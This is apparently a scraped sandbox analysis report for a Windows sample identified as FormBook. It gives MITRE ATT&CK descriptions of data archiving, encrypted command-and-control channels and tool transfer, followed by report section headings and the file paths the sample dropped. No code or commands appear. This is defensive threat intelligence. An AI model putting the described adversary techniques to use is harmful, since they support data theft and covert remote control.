Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KfYvtUBOq.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2m55bhzl.3io.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hsaurdy.f4g.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfqqjebp.dkc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmwoz1io.f1e.ps1

C:\Users\user\AppData\Local\Temp\tmp89CA.tmp

C:\Users\user\AppData\Local\Temp\tmp9563.tmp

C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

C:\Users\user\AppData\Roaming\KfYvtUBOq.exe:Zone.Identifier

Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre